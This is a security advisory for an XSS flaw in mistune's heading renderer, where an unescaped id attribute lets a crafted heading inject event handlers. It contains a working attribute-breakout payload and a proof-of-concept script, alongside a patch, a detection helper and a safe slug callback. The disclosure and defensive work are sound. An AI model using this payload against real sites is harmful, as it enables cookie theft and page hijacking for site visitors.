PT-2026-39330 · PyPI · Mistune

Published: 2026-05-09 · Updated: 2026-05-09 · CVE-2026-44897

CVSS v3.1: 6.1 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML, without calling escape(), safe_entity(), or any other sanitisation function. A double-quote character (") in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors such as #installation or #getting-started, is by far the most common real-world use of this callback; documentation generators routinely build anchors this way. When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
  tag = "h" + str(level)
  html = "<" + tag
  _id = attrs.get("id")
  if _id:
    html += ' id="' + _id + '"'  # ← _id is never escaped
  return html + ">" + text + "</" + tag + ">\n"
The heading body (text) is escaped upstream by the inline renderer, which is why double quotes in it arrive as &quot;. The id, by contrast, arrives as the raw string returned by the heading_id callback, and no escaping occurs at any point in the pipeline.
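To make the missing step concrete, the following self-contained sketch re-implements the concatenation from the snippet above as a standalone function (vulnerable_heading) next to a patched variant (patched_heading) that first passes the id through Python's standard html.escape(..., quote=True). Both function names are hypothetical and this is not mistune's code; an upstream fix may use mistune's own escaping helpers instead.

```python
import html


def vulnerable_heading(text: str, level: int, **attrs) -> str:
    # Replica of the concatenation shown above: the id value is inserted verbatim.
    # (The local is named "out" so it does not shadow the html module.)
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        out += ' id="' + _id + '"'
    return out + ">" + text + "</" + tag + ">\n"


def patched_heading(text: str, level: int, **attrs) -> str:
    # Same logic, but quote=True turns " into &quot; so it cannot end the attribute.
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        out += ' id="' + html.escape(_id, quote=True) + '"'
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(vulnerable_heading("foo", 2, id=payload), end="")
# <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo</h2>
print(patched_heading("foo", 2, id=payload), end="")
# <h2 id="foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;">foo</h2>
```

With the patch, every quote in the payload stays inside the id value, so no new attribute is created, while ordinary ids such as toc_1 pass through unchanged.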

PoC

Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
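from mistune import create_markdown
from mistune.toc import add_toc_hook

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)     # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)   # parse() returns (html, state)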
Output (the ID is auto-generated; no user text appears in it):
<h2 id="toc_1">Introduction</h2>
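The baseline is safe because the id is computed from the heading's position alone. The sketch below models that flow under simplifying assumptions: tokens are plain dicts with type, text and attrs keys, and assign_heading_ids is a hypothetical stand-in for the TOC hook, not mistune's actual implementation.

```python
from typing import Callable, Dict, List

HeadingId = Callable[[dict, int], str]


def default_heading_id(token: dict, index: int) -> str:
    # Position-based id: token["text"] is never consulted.
    return "toc_" + str(index + 1)


def assign_heading_ids(tokens: List[Dict], heading_id: HeadingId = default_heading_id) -> List[Dict]:
    # Hypothetical stand-in for the TOC hook: walk the heading tokens in order
    # and store whatever the callback returns as attrs["id"].
    headings = [tok for tok in tokens if tok["type"] == "heading"]
    for index, tok in enumerate(headings):
        tok.setdefault("attrs", {})["id"] = heading_id(tok, index)
    return headings


tokens = [
    {"type": "heading", "text": "Introduction", "attrs": {"level": 2}},
    {"type": "paragraph", "text": "Some prose."},
    {"type": "heading", "text": 'foo" onmouseover="alert(1)" x="', "attrs": {"level": 2}},
]
for tok in assign_heading_ids(tokens):
    print(tok["attrs"]["id"])
# toc_1
# toc_2
```

Even the hostile second heading receives toc_2: with the default callback, nothing the author types can reach the id attribute.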
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, MkDocs, Sphinx and Jekyll all do this). The PoC uses the simplest possible version, returning the raw heading text unchanged, to show the vulnerability without any extra transformation:
def raw_id(token, index):
  return token.get("text", "")  # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
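raw_id is deliberately minimal, but a light-touch slug function does not automatically close the hole. The hypothetical naive_slug below only lowercases the text and replaces spaces with hyphens; the double quote survives, so when its result is concatenated into id="..." the quote still terminates the attribute early. Which attribute names a browser then parses depends on what follows the quote, but the breakout itself is not prevented.

```python
def naive_slug(token: dict, index: int) -> str:
    # Hypothetical "first attempt" slugifier: lowercase, spaces -> hyphens.
    # Nothing here removes or escapes the double quote.
    return token.get("text", "").strip().lower().replace(" ", "-")


benign = {"text": "Getting Started"}
hostile = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}

print(naive_slug(benign, 0))   # getting-started
print(naive_slug(hostile, 1))  # foo"-onmouseover="alert(document.cookie)"-x="
```

Any callback whose output can contain " (or that is not escaped by the renderer) leaves the id= attribute breakable.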
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This value is passed verbatim to heading() as the id attribute.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
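One way to confirm the breakout without a browser is to parse the rendered HTML and list the attributes on each heading. The sketch below uses the standard-library html.parser module; HeadingAttrCollector and find_event_handlers are hypothetical names, and flagging attributes whose names start with "on" is a heuristic for event handlers, not a complete XSS check.

```python
from html.parser import HTMLParser
from typing import List, Tuple

HEADING_TAGS = {"h1", "h2", "h3", "h4", "h5", "h6"}


class HeadingAttrCollector(HTMLParser):
    # Records the (tag, attrs) pair of every h1-h6 start tag it sees.
    def __init__(self) -> None:
        super().__init__()
        self.headings: List[Tuple[str, list]] = []

    def handle_starttag(self, tag, attrs):
        if tag in HEADING_TAGS:
            self.headings.append((tag, attrs))


def find_event_handlers(rendered: str) -> List[Tuple[str, str]]:
    # Return (tag, attribute-name) pairs for any on* attribute on a heading.
    parser = HeadingAttrCollector()
    parser.feed(rendered)
    parser.close()
    return [
        (tag, name)
        for tag, attrs in parser.headings
        for name, _value in attrs
        if name.startswith("on")
    ]


# The "Actual output" shown in Step 4, copied verbatim.
actual = (
    '<h2 id="foo" onmouseover="alert(document.cookie)" x="">'
    "foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>"
)
print(find_event_handlers(actual))                               # [('h2', 'onmouseover')]
print(find_event_handlers('<h2 id="toc_1">Introduction</h2>'))  # []
```

The escaped body text is treated as character data, so only the attributes that escaped from id= are reported.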

Script

The following script reproduces the issue and writes an HTML report that renders both the baseline and the exploit in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
  return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
  f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
  f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
  return f"""
<div class="case {kind}">
 <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
 <div class="panels">
  <div class="panel">
   <h3>Input — {h.escape(filename)}</h3>
   <pre>{h.escape(src)}</pre>
  </div>
  <div class="panel">
   <h3>Output — HTML source</h3>
   <pre>{h.escape(out)}</pre>
   <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
   <div class="rendered">{out}</div>
  </div>
 </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when the heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

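out_path = os.path.join(os.getcwd(), "report_h2.html")
# The page contains non-ASCII characters (→, ↓), so write it as UTF-8 explicitly.
with open(out_path, "w", encoding="utf-8") as f:
  f.write(page)
print(f"\n[report] {out_path}")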
Example usage (with the script saved as poc.py):
python poc.py
Once the script has run, open report_h2.html in a browser and hover over the heading in the EXPLOIT panel to trigger the injected onmouseover handler.

Impact

Dimension | Assessment
Confidentiality | Session cookie or auth token theft via JavaScript executed on mouse interaction
Integrity | DOM manipulation, phishing content injection, forced navigation
Availability | The attacker's script can freeze or crash the page
Risk context: this vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it passes a heading_id callback to mistune without independently sanitising the returned value.
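For applications that need slug-style anchors on an affected version, one mitigation is a heading_id callback that only emits characters which cannot end an attribute value. The sketch below is an illustrative example, not a library function: safe_slug_id is a hypothetical name, the allowed character set [a-z0-9-] and the section-N fallback are arbitrary choices, and duplicate headings would still receive duplicate ids.

```python
import re
import unicodedata


def safe_slug_id(token: dict, index: int) -> str:
    """Hypothetical heading_id callback: (token, index) -> id string."""
    text = token.get("text", "")
    # Fold accented characters to ASCII where possible and drop the rest.
    text = unicodedata.normalize("NFKD", text).encode("ascii", "ignore").decode("ascii")
    # Collapse every run of characters outside [a-z0-9] (quotes, spaces,
    # angle brackets, punctuation) into a single hyphen, then trim the ends.
    slug = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")
    # Fall back to a position-based id when nothing usable remains.
    return slug or "section-" + str(index + 1)


print(safe_slug_id({"text": "Getting Started"}, 0))  # getting-started
print(safe_slug_id({"text": 'foo" onmouseover="alert(document.cookie)" x="'}, 1))
# foo-onmouseover-alert-document-cookie-x
print(safe_slug_id({"text": '"""'}, 2))  # section-3
```

It would be wired in the same way as the PoC's callback, add_toc_hook(md, heading_id=safe_slug_id). Escaping the id inside heading() remains the root-cause fix; a restrictive callback is defence in depth.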

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-44897
GHSA-V87V-83H2-53W7

Affected Products

Mistune